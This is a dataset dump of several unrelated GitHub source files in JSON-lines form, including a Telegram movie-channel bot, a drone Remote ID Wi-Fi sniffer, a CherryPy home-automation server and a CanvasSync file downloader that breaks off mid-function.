RestaurantDeactivatedEvent(ConsumerEvent[RestaurantDeactivatedSchema]):\r\n \"\"\"\r\n Event when Restaurant is deactivated.\r\n \"\"\"\r\n\r\n schema_class = RestaurantDeactivatedSchema\r\n\r\n async def action(self, uow: SqlAlchemyUnitOfWork):\r\n \"\"\"\r\n Deactivates a restaurant.\r\n\r\n Args:\r\n uow (SqlAlchemyUnitOfWork): The unit of work instance.\r\n \"\"\"\r\n\r\n restaurant_service = RestaurantService()\r\n\r\n async with uow_transaction_with_commit(uow) as uow:\r\n await restaurant_service.deactivate(self._data.id, uow)\r\n\r\n\r\nclass RestaurantManagerCreatedEvent(ConsumerEvent[RestaurantManagerCreatedSchema]):\r\n \"\"\"\r\n Event when RestaurantManager is created.\r\n \"\"\"\r\n\r\n schema_class = RestaurantManagerCreatedSchema\r\n\r\n async def action(self, uow: SqlAlchemyUnitOfWork):\r\n \"\"\"\r\n Creates a new restaurant manager.\r\n\r\n Args:\r\n uow (SqlAlchemyUnitOfWork): The unit of work instance.\r\n \"\"\"\r\n\r\n restaurant_manager_service = RestaurantManagerService()\r\n\r\n async with uow_transaction_with_commit(uow) as uow:\r\n await restaurant_manager_service.create(self._data, uow)\r\n","repo_name":"Ash1VT/food-delivery-backend","sub_path":"menu/src/consumer/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36343026507","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# (c) @AlbertEinsteinTG \n\n\nfrom pyrogram import filters, Client, __version__\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery, Message\nfrom bot import Translation # pylint: disable=import-error\nfrom bot.database import Database # pylint: disable=import-error\nimport asyncio\nfrom pyrogram.errors import FloodWait\nfrom bot.bot import Bot\nfrom bot import ADMINS, OWNER_ID, DISABLE_CHANNEL_BUTTON\nfrom helper_func import encode, decode, get_messages\n\ndb = Database()\n\n\n@Client.on_message(filters.command([\"start\"]) & filters.private, group=1)\nasync def start(bot, update):\n \n try:\n file_uid = update.command[1]\n except IndexError:\n file_uid = False\n \n if file_uid:\n file_id, file_name, file_caption, file_type = await db.get_file(file_uid)\n \n if (file_id or file_type) == None:\n return\n \n caption = file_caption if file_caption != (\"\" or None) else (\"File Name : \\n \" + \"\" + file_name + \"\" + \" \\n \\n \\n ❤️ 𝚃𝚑𝚊𝚗𝚔𝚢𝚘𝚞 𝙵𝚘𝚛 𝚄𝚜𝚒𝚗𝚐 𝙾𝚞𝚛 𝚂𝚎𝚛𝚟𝚒𝚌𝚎 𝙿𝚕𝚎𝚊𝚜𝚎 𝚂𝚞𝚙𝚙𝚘𝚛𝚝 𝚄𝚜 𝙱𝚢 𝚂𝚑𝚊𝚛𝚒𝚗𝚐 𝙾𝚞𝚛 𝙲𝚑𝚊𝚗𝚗𝚎𝚕/𝙶𝚛𝚘𝚞𝚙 𝙻𝚒𝚗𝚔 𝚃𝚘 𝚈𝚘𝚞𝚛 𝙵𝚛𝚒𝚎𝚗𝚍𝚜 \\n \\n ❁𝕁𝕠𝕚𝕟 𝕆𝕦𝕣 ℂ𝕙𝕒𝕟𝕟𝕖𝕝𝕤❁ \\n \\n ⟱⟱⟱⟱⟱⟱⟱⟱⟱⟱⟱⟱ \\n \\n 𝕮𝖍𝖆𝖓𝖓𝖊𝖑: @MoviE_LinkS_0nlY \\n ➻ 📌𝕮𝖍𝖆𝖓𝖓𝖊𝖑 : @BoX_0fFiCe \\n ➻ 👥𝕲𝖗𝖔𝖚𝖕 : @Mv_mania \\n ➻ 👥𝕲𝖗𝖔𝖚𝖕 : @agorimovies \\n \") \n \n if file_type == \"document\":\n \n await bot.send_document(\n chat_id=update.chat.id,\n document = file_id,\n caption = caption,\n parse_mode=\"html\",\n reply_to_message_id=update.message_id,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton('𝚂𝙷𝙰𝚁𝙴🌐', url='https://t.me/share/url?url=💯%20𝙽𝙾%201%20𝙼𝙾𝚅𝙸𝙴%20𝚁𝙴𝚀𝚄𝙴𝚂𝚃𝙸𝙽𝙶%20𝙶𝚁𝙾𝚄𝙿%20𝙸𝙽%20𝚃𝙴𝙻𝙴𝙶𝚁𝙰𝙼%20✅%20%0A%0A𝙹𝙾𝙸𝙽%20𝙰𝙽𝙳%20𝚁𝙴𝚀%20𝚈𝙾𝚄𝚁%20𝙵𝙰𝚅𝙾𝚁𝙸𝚃𝙴%20𝙼𝙾𝚅𝙸𝙴𝚂%20𝚁𝙸𝙶𝙷𝚃%20𝙽𝙾��%20%0A%0A💠%20➠%20𝙶𝚁𝙾𝚄𝙿%20:-%20@Mv_Mania%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@BoX_0fFiCe%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@MoviE_LinkS_0nlY')\n ],\n [\n InlineKeyboardButton('🎥𝙶𝚁𝙾𝚄𝙿', url='https://t.me/mv_mania'),\n InlineKeyboardButton('𝙲𝙷𝙰𝙽𝙽𝙴𝙻🎭', url='https://t.me/MoviE_LinkS_0nlY')\n ]\n ]\n )\n ) \n \n elif file_type == \"video\":\n \n await bot.send_video(\n chat_id=update.chat.id,\n video = file_id,\n caption = caption,\n parse_mode=\"html\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton('𝚂𝙷𝙰𝚁𝙴🌐', url='https://t.me/share/url?url=💯%20𝙽𝙾%201%20𝙼𝙾𝚅𝙸𝙴%20𝚁𝙴𝚀𝚄𝙴𝚂𝚃𝙸𝙽𝙶%20𝙶𝚁𝙾𝚄𝙿%20𝙸𝙽%20𝚃𝙴𝙻𝙴𝙶𝚁𝙰𝙼%20✅%20%0A%0A𝙹𝙾𝙸𝙽%20𝙰𝙽𝙳%20𝚁𝙴𝚀%20𝚈𝙾𝚄𝚁%20𝙵𝙰𝚅𝙾𝚁𝙸𝚃𝙴%20𝙼𝙾𝚅𝙸𝙴𝚂%20𝚁𝙸𝙶𝙷𝚃%20𝙽𝙾𝚆%20%0A%0A💠%20➠%20𝙶𝚁𝙾𝚄𝙿%20:-%20@Mv_Mania%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@BoX_0fFiCe%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@MoviE_LinkS_0nlY')\n ],\n [\n InlineKeyboardButton('🎥𝙶𝚁𝙾𝚄𝙿', url='https://t.me/mv_mania'),\n InlineKeyboardButton('𝙲𝙷𝙰𝙽𝙽𝙴𝙻🎭', url='https://t.me/MoviE_LinkS_0nlY')\n ]\n ]\n )\n )\n \n elif file_type == \"audio\":\n \n await bot.send_audio(\n chat_id=update.chat.id,\n audio = file_id,\n caption = caption,\n parse_mode=\"html\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton('𝚂𝙷𝙰𝚁𝙴🌐', url='https://t.me/share/url?url=💯%20𝙽𝙾%201%20𝙼𝙾𝚅𝙸𝙴%20𝚁𝙴𝚀𝚄𝙴𝚂𝚃𝙸𝙽𝙶%20𝙶𝚁𝙾𝚄𝙿%20𝙸𝙽%20𝚃𝙴𝙻𝙴𝙶𝚁𝙰𝙼%20✅%20%0A%0A𝙹𝙾𝙸𝙽%20𝙰𝙽𝙳%20𝚁𝙴𝚀%20𝚈𝙾𝚄𝚁%20𝙵𝙰𝚅𝙾𝚁𝙸𝚃𝙴%20𝙼𝙾𝚅𝙸𝙴𝚂%20𝚁𝙸𝙶𝙷𝚃%20𝙽𝙾𝚆%20%0A%0A💠%20➠%20𝙶𝚁𝙾𝚄𝙿%20:-%20@Mv_Mania%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@BoX_0fFiCe%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@MoviE_LinkS_0nlY')\n ],\n [\n InlineKeyboardButton('🎥𝙶𝚁𝙾𝚄𝙿', url='https://t.me/mv_mania'),\n InlineKeyboardButton('𝙲𝙷𝙰𝙽𝙽𝙴𝙻🎭', url='https://t.me/MoviE_LinkS_0nlY')\n ]\n ]\n )\n )\n\n else:\n print(file_type)\n \n return\n\n \n await bot.send_photo(\n chat_id=update.chat.id,\n photo=\"https://telegra.ph/file/fe403b72f9dd617f96441.jpg\",\n caption=Translation.START_TEXT.format(\n update.from_user.mention),\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\"⚙️𝙷𝙴𝙻𝙿\", callback_data = \"ghelp\")\n ],\n [\n InlineKeyboardButton('🏘️𝙶𝚁𝙾𝚄𝙿', url='https://t.me/mv_mania'),\n InlineKeyboardButton('🎬𝙲𝙷𝙰𝙽𝙽𝙴𝙻', url='https://t.me/BoX_0fFiCe')\n ],\n [\n InlineKeyboardButton('🔎𝚄𝙿𝙳𝙰𝚃𝙴𝚂', url='https://t.me/MoviE_LinkS_0nlY'),\n InlineKeyboardButton('🗃️𝚂𝙾𝚄𝚁𝙲𝙴', callback_data = \"source_help\")\n ]\n ]\n ), \n parse_mode=\"html\",\n reply_to_message_id=update.message_id\n )\n\n\n@Client.on_message(filters.command([\"help\"]) & filters.private, group=1)\nasync def help(bot, update):\n \n await bot.send_message(\n chat_id=update.chat.id,\n text=Translation.HELP_USER,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton('Auto Filter', callback_data = \"auto_fltr\"),\n InlineKeyboardButton('File Store', callback_data = \"file_saver\")\n ],\n [\n InlineKeyboardButton('Vc Player', callback_data = \"vcbots\"),\n InlineKeyboardButton('Filters', callback_data = \"filetr\")\n ],\n [\n InlineKeyboardButton('💬About', callback_data = \"about\")\n ]\n ]\n )\n )\n\n@Client.on_message(filters.text & ~ filters.command([\"start\",\"help\",\"batch\",\"genlink\",\"cccurrent\",\"userbotjoinchannel\",\"channelplay\",\"play\",\"dplay\",\"splay\",\"player\",\"skip\",\"pause\",\"resume\",\"end\",\"current\",\"playlist\",\"cresume\",\"cplayer\",\"cplaylist\",\"cdplay\",\"unset\",\"csplay\",\"cplay\",\"pmpermit\",\"gcast\",\"userbotleaveall\",\"userbotjoin\",\"admincache\",\"remall\",\"rem\",\"viewfilters\",\"filter\",\"info\",\"set\",\"sets\",\"id\",\"status\"]) & filters.private & ~ filters.me)\nasync def note(bot, update):\n buttons = [[\n InlineKeyboardButton('🏡𝙼𝙰𝙸𝙽 𝙲𝙷𝙰𝙽𝙽𝙴𝙻', url='https://t.me/MoviE_LinkS_0nlY'),\n InlineKeyboardButton('📽️𝙼𝙾𝚅𝙸𝙴 𝙲𝙷𝙰𝙽𝙽𝙴𝙻', url ='https://t.me/BoX_0fFiCe')\n ],[\n InlineKeyboardButton('🤔𝙷𝙾𝚆 𝚃𝙾 𝚁𝙴𝚀?', url='https://t.me/MoviE_LinkS_0nlY/5')\n ],[\n InlineKeyboardButton('𝚂𝙷𝙰𝚁𝙴 𝚃𝙾 𝚈𝙾𝚄𝚁 𝙵𝚁𝙸𝙴𝙽𝙳𝚂😍', url='https://t.me/share/url?url=💯%20𝙽𝙾%201%20𝙼𝙾𝚅𝙸𝙴%20𝚁𝙴𝚀𝚄𝙴𝚂𝚃𝙸𝙽𝙶%20𝙶𝚁𝙾𝚄𝙿%20𝙸𝙽%20𝚃𝙴𝙻𝙴𝙶𝚁𝙰𝙼%20✅%20%0A%0A𝙹𝙾𝙸𝙽%20𝙰𝙽𝙳%20𝚁𝙴𝚀%20𝚈𝙾𝚄𝚁%20𝙵𝙰𝚅𝙾𝚁𝙸𝚃𝙴%20𝙼𝙾𝚅𝙸𝙴𝚂%20𝚁𝙸𝙶𝙷𝚃%20𝙽𝙾𝚆%20%0A%0A💠%20➠%20𝙶𝚁𝙾𝚄𝙿%20:-%20@Mv_Mania%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@BoX_0fFiCe%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@MoviE_LinkS_0nlY')\n \n ]]\n \n reply_markup = InlineKeyboardMarkup(buttons)\n\n if update.from_user.id not in ADMINS:\n await bot.send_message(\n chat_id=update.chat.id,\n text=Translation.REQ_IN_PM,\n reply_markup=reply_markup,\n parse_mode=\"html\",\n reply_to_message_id=update.message_id\n )\n \n","repo_name":"VasuDevbyte/Bandersnatch","sub_path":"Commands(4).py","file_name":"Commands(4).py","file_ext":"py","file_size_in_byte":9406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9655948073","text":"from terminusdb_client import WOQLClient\nfrom terminusdb_client.woqlschema import WOQLSchema, DocumentTemplate, LexicalKey\n\nuser = \"jimbo\"\nteam = \"logicistics\" # My team name.\nendpoint = f\"https://cloud.terminusdb.com/{team}/\"\nclient = WOQLClient(endpoint)\n\nclient.connect(user=user, team=team, use_token=True)\n\nclient.create_database(\"example_db\")\n\nschema = WOQLSchema()\n\nclass Player(DocumentTemplate):\n _schema = schema\n _key = LexicalKey([\"name\"])\n name: str\n position: str\n \nschema.commit(client, commit_msg = \"Adding Player Schema\")\n\nobjects = [\n Player(name=\"George\", position=\"Centre Back\"),\n Player(name=\"Doug\", position=\"Full Back\"),\n Player(name=\"Karen\", position=\"Centre Forward\")\n ]\n\nclient.insert_document(objects, commit_msg = f\"Inserting player data\")\n\ndocuments = client.get_all_documents()\n\n# documents comes back as a iterable that can be convert into a list\nprint(\"All documents\")\nprint(list(documents))\n\nprint(\"=============\")\n\n# getting a specific document by id\nplayer_doug = client.get_document(\"Player/Doug\")\nprint(\"Specific document\")\nprint(player_doug)\n\n\nmatches = client.query_document({\"@type\" : \"Player\",\n \"position\": \"Full Back\"})\n\n# matches comes back as a iterable that can be convert into a list\nprint(list(matches))\n","repo_name":"terminusdb/terminusdb-docs","sub_path":"code-examples/start-with-client/getting-started.py","file_name":"getting-started.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"47611062483","text":"import logging\n\nfrom scapy.layers.dot11 import Dot11Beacon, Dot11EltVendorSpecific\nfrom scapy.packet import Packet\n\nfrom info_handler import save_drone_info\nfrom parser_handler import DefaultHandler, DjiHandler, AsdStanHandler\nfrom parsers import Parser\n\nhandler = AsdStanHandler(DjiHandler(DefaultHandler(None)))\nhome_locations = {}\n\n\ndef filter_frames(packet: Packet) -> None:\n \"\"\"\n Method to filter Wi-Fi frames. Only frames containing a vendor specific element will not be filtered out\n directly. After the first filter a second one is applied which checks if an OUI of the vendor specific elements\n belongs to a format of an implemented handler. If not, it will be dismissed and the next Wi-Fi frame passes through\n the same filter logic.\n\n Args:\n packet (Packet): Wi-Fi frame.\n \"\"\"\n #if packet.haslayer(Dot11Beacon): # Monitor 802.11 beacon traffic\n if packet.haslayer(Dot11EltVendorSpecific): # check vendor specific ID -> 221\n vendor_spec: Dot11EltVendorSpecific = packet.getlayer(Dot11EltVendorSpecific)\n while vendor_spec:\n layer_oui = Parser.dec2hex(vendor_spec.oui)\n if handler.is_drone(layer_oui):\n # parse header\n remote_id = handler.parse(vendor_spec.info, layer_oui)\n if remote_id:\n serial = remote_id.serial_number\n logging.info(f\"Parsed Remote ID with serial number for: {serial}\")\n\n remote_id.add_home_loc(home_locations)\n logging.info(f\"Remote ID: {remote_id}\")\n\n save_drone_info(remote_id)\n break\n else:\n vendor_spec: Dot11EltVendorSpecific = vendor_spec.payload.getlayer(Dot11EltVendorSpecific)\n continue\n","repo_name":"cyber-defence-campus/RemoteIDReceiver","sub_path":"Receiver/backend/dronesniffer/drone_sniffer.py","file_name":"drone_sniffer.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"77"} +{"seq_id":"33551449371","text":"data=[2,0,6,12,1,3]\n\n#data=[0,3,6]\nlastNum = data[0]\nmem = {}\nfor i,d in enumerate(data):\n lastNum = d\n mem.setdefault(d,[]).append(i+1)\n \n \nturns = 30000000\n#turns = 2020\ndef findOccurences(data, val):\n res = []\n for i in range(len(data)-1,-1,-1):\n if data[i] == val:\n res.append(i+1)\n if len(res) >=2:\n break\n return res\n\n\nfor i in range(len(data),turns):\n if lastNum in mem:\n if len(mem[lastNum]) < 2: \n lastNum = 0\n else:\n lastNum = mem[lastNum][-1]-mem[lastNum][-2]\n mem.setdefault(lastNum,[]).append(i+1) \n \nprint(lastNum)\n","repo_name":"zac112/adventOfCode","sub_path":"code2020/day15/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"73199606648","text":"from datetime import datetime\n\n\ndef get_logs(start_interv, end_interv, logs):\n chosen_logs = []\n for i in range(start_interv, end_interv + 1):\n if i in logs:\n value = logs[i]\n chosen_logs.append(value)\n return set(chosen_logs)\n\n\ndef main():\n with open('logs_timestamp.csv', 'r') as fopen:\n content = fopen.read()\n\n intro = \"\"\"\n Format: day-month-year hour:minutes\n \"\"\"\n print(intro)\n start = input(\"Please provide the start time:\\t\")\n start_date = datetime.strptime(start, '%d-%m-%Y %H:%M')\n start_timestamp = datetime.timestamp(start_date)\n end = input(\"Please provide the end time:\\t\")\n end_date = datetime.strptime(end, '%d-%m-%Y %H:%M')\n end_timestamp = datetime.timestamp(end_date)\n\n some_logs = {}\n\n content = content.split('\\n')\n for l in content:\n if l != '':\n line = l.split(',')\n\n some_logs[int(line[0])] = line[1].strip().replace(\"'\", \"\")\n\n print(int(start_timestamp))\n print(int(end_timestamp))\n\n chosen_logs = get_logs(int(start_timestamp), int(end_timestamp), some_logs)\n print(chosen_logs)\n\nif __name__ == '__main__':\n main()","repo_name":"FlyingMedusa/PythonCourse","sub_path":"ChristmasExtras/04some_logs.py","file_name":"04some_logs.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37800705183","text":"webPort = 80\nwebRestPort = 7478\nwebUpdateInterval = 1\nwebPageTitle = \"Home Automation\"\n\ninsideTemp = \"kitchenTemp\"\noutsideTemp = \"deckTemp\"\npoolTemp = \"waterTemp\"\n\nimport cherrypy\nimport json\nfrom jinja2 import Environment, FileSystemLoader\nfrom ha.HAClasses import *\nfrom haWebViews import *\n\nclass WebRoot(object):\n def __init__(self, resources, env, cache, stateChangeEvent, resourceLock):\n self.resources = resources\n self.env = env\n self.cache = cache\n self.stateChangeEvent = stateChangeEvent\n self.resourceLock = resourceLock\n \n # Everything \n @cherrypy.expose\n def index(self, group=None):\n debug('debugWeb', \"/\", \"get\", group)\n try:\n groups = [group.capitalize()]\n details = False\n except:\n groups = [\"Time\", \"Temperature\", \"Hvac\", \"Services\", \"Pool\", \"Lights\", \"Doors\", \"Water\", \"Solar\", \"Power\", \"Cameras\", \"Tasks\"]\n details = True\n with self.resourceLock:\n reply = self.env.get_template(\"default.html\").render(title=webPageTitle, script=\"\", \n groups=[[group, self.resources.getGroup(group)] for group in groups],\n views=views,\n details=details)\n return reply\n\n # Tacoma \n @cherrypy.expose\n def tacoma(self):\n debug('debugWeb', \"/\", \"get\")\n with self.resourceLock:\n reply = self.env.get_template(\"tacoma.html\").render(title=webPageTitle, script=\"\", \n group=self.resources.getGroup(\"Tacoma\"),\n views=views)\n return reply\n\n # Solar \n @cherrypy.expose\n def solar(self, action=None, resource=None):\n debug('debugWeb', \"/solar\", \"get\", action, resource)\n with self.resourceLock:\n inverters = self.resources.getGroup(\"Inverters\")\n optimizers = self.resources.getGroup(\"Optimizers\")\n latitude = \"%7.3f \"%(abs(latLong[0])+.0005)+(\"N\" if latLong[0]>0 else \"S\")\n longitude = \"%7.3f \"%(abs(latLong[1])+.0005)+(\"E\" if latLong[1]>0 else \"W\")\n reply = self.env.get_template(\"solar.html\").render(script=\"\",\n dayOfWeek=self.resources.getRes(\"theDayOfWeek\"),\n date=self.resources.getRes(\"theDate\"),\n time=self.resources.getRes(\"theTime\"),\n ampm=self.resources.getRes(\"theAmPm\"),\n sunrise=self.resources.getRes(\"sunrise\"),\n sunset=self.resources.getRes(\"sunset\"),\n latitude=latitude, longitude=longitude,\n airTemp=self.resources.getRes(outsideTemp),\n inverterTemp=self.resources.getRes(\"inverterTemp\"), \n roofTemp=self.resources.getRes(\"roofTemp\"), \n currentLoad=self.resources.getRes(\"currentLoad\"), \n currentPower=self.resources.getRes(\"currentPower\"), \n todaysEnergy=self.resources.getRes(\"todaysEnergy\"), \n lifetimeEnergy=self.resources.getRes(\"lifetimeEnergy\"), \n inverters=inverters, \n optimizers=optimizers, \n views=views)\n return reply\n\n # iPad - 1024x768 \n @cherrypy.expose\n def ipad(self, action=None, resource=None):\n debug('debugWeb', \"/ipad\", \"get\", action, resource)\n with self.resourceLock:\n reply = self.env.get_template(\"ipad.html\").render(script=\"\", \n time=self.resources.getRes(\"theTime\"),\n ampm=self.resources.getRes(\"theAmPm\"),\n day=self.resources.getRes(\"theDay\"),\n pooltemp=self.resources.getRes(poolTemp),\n intemp=self.resources.getRes(insideTemp),\n outtemp=self.resources.getRes(outsideTemp),\n groups=[[\"Pool\", self.resources.getResList([\"spaTemp\"])], \n [\"Lights\", self.resources.getResList([\"porchLights\", \"bbqLights\", \"backYardLights\", \"poolLight\", \"spaLight\"])], \n# [\"Lights\", self.resources.getResList([\"xmasTree\", \"xmasCowTree\", \"xmasLights\"])], \n [\"Shades\", self.resources.getResList([\"allShades\", \"shade1\", \"shade2\", \"shade3\", \"shade4\"])], \n [\"Hvac\", self.resources.getResList([\"southHeatTempTarget\", \"northHeatTempTarget\"])], \n [\"Sprinklers\", self.resources.getResList([\"backLawnSequence\", \"gardenSequence\", \"sideBedSequence\", \"frontLawnSequence\"])]\n ],\n views=views)\n return reply\n\n # iPhone 5 - 320x568 \n @cherrypy.expose\n def iphone5(self, action=None, resource=None):\n debug('debugWeb', \"/iphone5\", \"get\", action, resource)\n with self.resourceLock:\n reply = self.env.get_template(\"iphone5.html\").render(script=\"\", \n time=self.resources.getRes(\"theTime\"),\n ampm=self.resources.getRes(\"theAmPm\"),\n temp=self.resources.getRes(outsideTemp),\n resources=self.resources.getResList([\"spaTemp\", \"xmasTree\", \"xmasCowTree\", \"porchLights\", \"xmasLights\", \"allShades\", \"shade1\", \"shade2\", \"shade3\", \"shade4\", \"backLawn\", \"backBeds\", \"garden\", \"sideBeds\", \"frontLawn\"]),\n views=views)\n return reply\n\n # iPhone 3GS - 320x480 \n @cherrypy.expose\n def iphone3gs(self, action=None, resource=None):\n debug('debugWeb', \"/iphone3gs\", \"get\", action, resource)\n with self.resourceLock:\n reply = self.env.get_template(\"iphone3gs.html\").render(script=\"\", \n time=self.resources.getRes(\"theTime\"),\n ampm=self.resources.getRes(\"theAmPm\"),\n day=self.resources.getRes(\"theDay\"),\n temp=self.resources.getRes(outsideTemp),\n resources=self.resources.getResList([\"porchLights\", \"xmasLights\", \"bedroomLights\", \"recircPump\", \"garageDoors\", \"houseDoors\"]),\n views=views)\n return reply\n\n # get or set a resource state\n @cherrypy.expose\n def cmd(self, resource=None, state=None):\n debug('debugWeb', \"/cmd\", \"get\", resource, state)\n try:\n if resource == \"resources\":\n reply = \"\"\n for resource in self.resources.keys():\n if resource != \"states\":\n reply += resource+\"\\n\"\n return reply\n else:\n if state:\n self.resources.getRes(resource).setViewState(state, views)\n time.sleep(1) # hack\n return json.dumps({\"state\": self.resources.getRes(resource).getViewState(views)})\n except:\n return \"Error\" \n\n # Return the value of a resource attribute\n @cherrypy.expose\n def value(self, resource=None, attr=None):\n try:\n if resource:\n if attr:\n return self.resources.getRes(resource).__getattribute__(attr).__str__()\n else:\n return self.resources.getRes(resource).dict().__str__()\n except:\n return \"Error\" \n\n # Update the states of all resources\n @cherrypy.expose\n def state(self, _=None):\n debug('debugWebUpdate', \"state\", cherrypy.request.remote.ip)\n return self.updateStates(self.resources.getRes(\"states\").getState())\n \n # Update the states of resources that have changed\n @cherrypy.expose\n def stateChange(self, _=None):\n debug('debugWebUpdate', \"stateChange\", cherrypy.request.remote.ip)\n debug('debugInterrupt', \"update\", \"event wait\")\n self.stateChangeEvent.wait()\n debug('debugInterrupt', \"update\", \"event clear\")\n self.stateChangeEvent.clear()\n return self.updateStates(self.resources.getRes(\"states\").getStateChange())\n\n # return the json to update the states of the specified collection of sensors\n def updateStates(self, resourceStates):\n staticTypes = [\"time\", \"ampm\", \"date\", \"W\", \"KW\"] # types whose class does not depend on their value\n tempTypes = [\"tempF\", \"tempFControl\", \"tempC\", \"spaTemp\"] # temperatures\n if self.cache:\n cacheTime = self.cache.cacheTime\n else:\n cacheTime = 0\n updates = {\"cacheTime\": cacheTime}\n for resource in resourceStates.keys():\n try:\n resState = self.resources.getRes(resource).getViewState(views)\n resClass = self.resources.getRes(resource).type\n if resClass in tempTypes:\n updates[resource] = (\"temp\", resState, tempColor(resState))\n else:\n if resClass not in staticTypes:\n resClass += \"_\"+resState\n updates[resource] = (resClass, resState, \"\")\n except:\n pass\n debug('debugWebUpdate', \"states\", len(updates))\n return json.dumps(updates)\n \n # Submit \n @cherrypy.expose\n def submit(self, action=None, resource=None):\n debug('debugWeb', \"/submit\", \"post\", action, resource)\n self.resources.getRes(resource).setViewState(action, views)\n reply = \"\"\n return reply\n\ndef webInit(resources, restCache, stateChangeEvent, resourceLock):\n # set up the web server\n baseDir = os.path.abspath(os.path.dirname(__file__))\n globalConfig = {\n 'server.socket_port': webPort,\n 'server.socket_host': \"0.0.0.0\",\n }\n appConfig = {\n '/css': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.root': os.path.join(baseDir, \"static\"),\n 'tools.staticdir.dir': \"css\",\n },\n '/js': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.root': os.path.join(baseDir, \"static\"),\n 'tools.staticdir.dir': \"js\",\n },\n '/images': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.root': os.path.join(baseDir, \"static\"),\n 'tools.staticdir.dir': \"images\",\n },\n '/favicon.ico': {\n 'tools.staticfile.on': True,\n 'tools.staticfile.filename': os.path.join(baseDir, \"static/favicon.ico\"),\n },\n } \n cherrypy.config.update(globalConfig)\n root = WebRoot(resources, Environment(loader=FileSystemLoader(os.path.join(baseDir, 'templates'))), restCache, stateChangeEvent, resourceLock)\n cherrypy.tree.mount(root, \"/\", appConfig)\n if not webLogging:\n access_log = cherrypy.log.access_log\n for handler in tuple(access_log.handlers):\n access_log.removeHandler(handler)\n cherrypy.engine.timeout_monitor.unsubscribe()\n cherrypy.engine.autoreload.unsubscribe()\n cherrypy.engine.start()\n\n","repo_name":"raelinamarie/ha","sub_path":"haWeb.py","file_name":"haWeb.py","file_ext":"py","file_size_in_byte":11452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23957784996","text":"\"\"\"\nCanvasSync by Mathias Perslev\nFebruary 2017\n\n--------------------------------------------\n\nImplements a class representing files not located on the Canvas server\nInitialization of this object thus does not require a info dictionary as is the case for all classes representing true\nCanvas entities. Instead, LinkedFile should be initialized with a direct download link.\nHowever, the LinkedFile is derived from the base entity class and the walk, sync and show methods are implemented\nand should be used in a similar fashion to other CanvasEntities objects.\n\nAn Assignment object is the parent object.\n\nSee developer_info.txt file for more information on the class hierarchy of CanvasEntities objects.\n\n\"\"\"\n\n# Future imports\nfrom __future__ import print_function\n\n# Inbuilt modules\nimport os\nimport sys\n\n# Third party modules\nimport requests\nfrom six import text_type\n\n# CanvasSync module imports\nfrom CanvasSync.entities.canvas_entity import CanvasEntity\nfrom CanvasSync.utilities.ANSI import ANSI\n\n\nclass LinkedFile(CanvasEntity):\n def __init__(self, download_url, parent):\n \"\"\"\n Constructor method, initializes base CanvasEntity class\n\n download_url : string | A URL pointing to a file somewhere on the web\n parent : object | The parent object, an Assignment object\n \"\"\"\n\n self.download_url = download_url\n self.valid_url = True\n\n # Get the potential file name from the URL\n # OBS: We do not correct the name in this class, as we need to use the length of the name to determine\n # if the link is valid.\n file_name = os.path.split(download_url)[-1]\n\n # File path\n file_path = parent.get_path() + file_name\n\n # No file extension or weirdly long filename will not be allowed\n # (this is not strictly necessary as the regex should only match OK URLs)\n if not os.path.splitext(file_name)[-1] or len(file_name) > 60:\n self.valid_url = False\n\n # Initialize base class\n CanvasEntity.__init__(self,\n id_number=-1,\n name=file_name,\n sync_path=file_path,\n parent=parent,\n folder=False,\n identifier=u\"linked_file\")\n\n def __repr__(self):\n \"\"\" String representation, overwriting base class method \"\"\"\n return u\" \" * 15 + u\"| \" + u\"\\t\" * self.indent + u\"%s: %s\" % (ANSI.format(u\"Linked File\",\n formatting=u\"linkedfile\"),\n self.name)\n\n def url_is_valid(self):\n return self.valid_url\n\n def print_status(self, status, color, overwrite_previous_line=False):\n \"\"\" Print status to console \"\"\"\n\n if overwrite_previous_line:\n # Move up one line\n sys.stdout.write(ANSI.format(u\"\", formatting=u\"lineup\"))\n sys.stdout.flush()\n\n print(ANSI.format(u\"[%s]\" % status, formatting=color) + str(self)[len(status) + 2:])\n sys.stdout.flush()\n\n def download(self):\n \"\"\"\n Download the file, returns True or False depecting if the file was downloaded or not. Returns -1 if the file\n was attempted downloaded but failed.\n \"\"\"\n if os.path.exists(self.sync_path):\n return False\n\n self.print_status(u\"DOWNLOADING\", color=u\"blue\")\n\n # Attempt to download the file\n try:\n response = requests.get(self.download_url)\n except 